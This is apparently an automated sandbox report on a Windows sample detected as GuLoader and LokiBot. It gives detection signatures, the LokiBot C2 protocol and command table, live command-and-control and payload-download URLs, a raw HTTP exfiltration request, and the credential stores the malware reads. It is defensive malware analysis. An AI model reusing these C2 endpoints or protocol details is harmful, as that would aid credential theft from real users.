
Windows Analysis Report
o6OaOfrAQs.exe

Overview

General Information

Sample Name: o6OaOfrAQs.exe
Analysis ID: 829095
MD5: 049ecad4587538c292e3ebeee5947eb5
SHA1: 12aabeb19083dd114b7b94c836b031de3945d2c9
SHA256: cf9a08d65a0b472b1ed84638a09d39d741f34e9cd2641092141a9bf1a5f796a6

Detection

GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Lokibot
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
One or more processes crash
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

  • System is w10x64native
  • o6OaOfrAQs.exe (PID: 6248 cmdline: C:\Users\user\Desktop\o6OaOfrAQs.exe MD5: 049ECAD4587538C292E3EBEEE5947EB5)
    • o6OaOfrAQs.exe (PID: 5540 cmdline: C:\Users\user\Desktop\o6OaOfrAQs.exe MD5: 049ECAD4587538C292E3EBEEE5947EB5)
      • WerFault.exe (PID: 4936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 204 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Loki Password Stealer (PWS), LokiBot
Description:
"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe

Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.

Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.

The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24 characters. For example: B7E1C2CC98066B250DDB2123.

Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\C98066\.

There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:

  • .exe: A copy of the malware that will execute every time the user account is logged into.
  • .lck: A lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.
  • .hdb: A database of hashes for data that has already been exfiltrated to the C2 server.
  • .kdb: A database of keylogger data that has yet to be sent to the C2 server.

If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.

The first packet transmitted by Loki-Bot contains application data. The second packet transmitted by Loki-Bot contains decrypted Windows credentials. The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.

Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.

The first WORD of the HTTP Payload represents the Loki-Bot version. The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:

  • 0x26: Stolen Cryptocurrency Wallet
  • 0x27: Stolen Application Data
  • 0x28: Get C2 Commands from C2 Server
  • 0x29: Stolen File
  • 0x2A: POS (Point of Sale?)
  • 0x2B: Keylogger Data
  • 0x2C: Screenshot

The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!

Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.

The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot's C2 infrastructure.

Loki-Bot can accept the following instructions from the C2 Server:

  • 0x00: Download EXE & Execute
  • 0x01: Download DLL & Load #1
  • 0x02: Download DLL & Load #2
  • 0x08: Delete HDB File
  • 0x09: Start Keylogger
  • 0x0A: Mine & Steal Data
  • 0x0E: Exit Loki-Bot
  • 0x0F: Upgrade Loki-Bot
  • 0x10: Change C2 Polling Frequency
  • 0x11: Delete Executables & Exit

Suricata Signatures (RULE SID: RULE NAME):

  • 2024311: ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected
  • 2024312: ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1
  • 2024313: ET TROJAN Loki Bot Request for C2 Commands Detected M1
  • 2024314: ET TROJAN Loki Bot File Exfiltration Detected
  • 2024315: ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1
  • 2024316: ET TROJAN Loki Bot Screenshot Exfiltration Detected
  • 2024317: ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2
  • 2024318: ET TROJAN Loki Bot Request for C2 Commands Detected M2
  • 2024319: ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2

Attribution:
  • SWEED
  • The Gorgon Group
  • Cobalt
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
No configs have been found
Source: dump.pcap | Rule: JoeSecurity_Lokibot_1 | Description: Yara detected Lokibot | Author: Joe Security
Source: 00000001.00000002.4873071383.000000000358C000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_2 | Description: Yara detected GuLoader | Author: Joe Security
Source: Process Memory Space: o6OaOfrAQs.exe PID: 6248 | Rule: JoeSecurity_GuLoader_3 | Description: Yara detected GuLoader | Author: Joe Security

No Sigma rule has matched
Timestamp: 03/17/23-20:49:57.296824
Source IP: 192.168.11.20
Destination IP: 185.246.220.85
SID: 2025381
Source Port: 49818
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 03/17/23-20:49:57.296824
Source IP: 192.168.11.20
Destination IP: 185.246.220.85
SID: 2024317
Source Port: 49818
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 03/17/23-20:49:57.296824
Source IP: 192.168.11.20
Destination IP: 185.246.220.85
SID: 2825766
Source Port: 49818
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 03/17/23-20:49:57.296824
Source IP: 192.168.11.20
Destination IP: 185.246.220.85
SID: 2024312
Source Port: 49818
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 03/17/23-20:49:57.296824
Source IP: 192.168.11.20
Destination IP: 185.246.220.85
SID: 2021641
Source Port: 49818
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: o6OaOfrAQs.exe | Virustotal: Detection: 28%
Source: o6OaOfrAQs.exe | ReversingLabs: Detection: 51%
Source: http://185.246.220.85/habrik/five/fre.php | Avira URL Cloud: Label: malware
Source: o6OaOfrAQs.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: o6OaOfrAQs.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb | source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
Source: Binary string: mshtml.pdb | source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: mshtml.pdbUGP | source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_0040626D FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_004026FE FindFirstFileA,

Networking

Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49818 -> 185.246.220.85:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49818 -> 185.246.220.85:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49818 -> 185.246.220.85:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49818 -> 185.246.220.85:80
Source: Traffic | Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.11.20:49818 -> 185.246.220.85:80
Source: Joe Sandbox View | IP Address: 85.95.248.49
Source: Joe Sandbox View | IP Address: 185.246.220.85
Source: global traffic | HTTP traffic detected:
  GET /jgEyxsZj50.ttf HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: ruhsalgelisim.com
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /habrik/five/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 185.246.220.85
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 5EE3769A
  Content-Length: 178
  Connection: close
Source: unknown | TCP traffic detected without corresponding DNS query: 185.246.220.85
Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: o6OaOfrAQs.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: o6OaOfrAQs.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://ocsp.digicert.com0O
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: o6OaOfrAQs.exe, 00000004.00000002.4895164716.0000000002505000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ruhsalgelisim.com/jgEyxsZj50.ttf
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.gopher.ftp://ftp.
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000626000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000003.4849423147.0000000032400000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com//
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/https://login.live.com/
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/v104
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown | DNS traffic detected: queries for: ruhsalgelisim.com
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_004051CF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 204
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_00404A0E
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_004065F6
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_6ED71A9C
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAEGISIIIRadeonHelper< vs o6OaOfrAQs.exe
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Section loaded: edgegdi.dll
Source: o6OaOfrAQs.exe | Static PE information: invalid certificate
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | File read: C:\Users\user\Desktop\o6OaOfrAQs.exe
Source: o6OaOfrAQs.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Process created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | File created: C:\Users\user\AppData\Roaming\fumigatorium
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | File created: C:\Users\user\AppData\Local\Temp\nsk77D8.tmp
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/19@1/2
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_004020D1 CoCreateInstance,MultiByteToWideChar,
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_0040449B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Mutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | File written: C:\Users\user\AppData\Local\Temp\Kontos.ini
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Data Obfuscation

Source: Yara match | File source: Process Memory Space: o6OaOfrAQs.exe PID: 6248, type: MEMORYSTR
Source: Yara match | File source: 00000001.00000002.4873071383.000000000358C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_6ED72F20 push eax; ret
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_03435F04 push es; ret
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_034303E6 push 620F66DAh; iretd
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_03430E2F push ds; ret
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_0343208F push edx; retf
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 4_2_01665F04 push es; ret
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 4_2_016603E6 push 620F66DAh; iretd
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 4_2_01660E2F push ds; ret
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 4_2_0166208F push edx; retf
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Code function: 1_2_6ED71A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | File created: C:\Users\user\AppData\Local\Temp\nsg7AC7.tmp\System.dll
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | File created: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dll
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dll
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | API call chain: ExitProcess graph end node
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
Source: o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicvss
Source: o6OaOfrAQs.exe, 00000004.00000002.4895164716.0000000002521000.00000004.00000020.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4895164716.00000000024E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Data Exchange Service
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Heartbeat Service
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Service Interface
Source: o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
Source: o6OaOfrAQs.exe, 00000004.00000002.4895164716.0000000002521000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW[A
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_6ED71A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_00402D63 GetTempPathA,GetTickCount,GetModuleFileNameA,GetFileSize,LdrInitializeThunk,GlobalAlloc,SetFilePointer,
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeProcess created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exeCode function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

        Stealing of Sensitive Information

        Source: Yara match | File source: dump.pcap, type: PCAP
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
